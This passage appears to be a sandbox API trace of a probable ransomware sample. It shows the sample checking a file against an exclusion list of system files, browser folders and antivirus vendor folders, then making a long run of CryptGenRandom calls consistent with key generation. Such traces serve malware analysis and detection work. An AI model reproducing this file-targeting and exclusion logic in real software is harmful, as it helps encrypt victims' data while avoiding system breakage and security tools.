0 [0156.625] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*.exe") returned 0 [0156.625] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*.dll") returned 0 [0156.625] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*.lnk") returned 0 [0156.625] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*.bat") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*.ini") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*.msi") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*.scf") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*pagefile.sys*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*NTUSER.DAT*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*AppData*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*\\winrar\\*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*\\java\\*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*\\windows\\*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*\\ESET\\*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*\\AVG\\*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*\\AVIRA\\*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*Atheros*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*Realtek*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*bootmgr*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*boot*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*boot*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*CONFIG.SYS*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*IO.SYS*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*MSDOS.SYS*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*NTDETECT.COM*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*ntldr*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*chrome*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*opera*") returned 0 [0156.626] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*firefox*") returned 0 [0156.626] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", pszSpec="*") returned 1 [0156.626] strlen (_Str="NMoreira") returned 0x8 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.626] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.627] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.628] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: 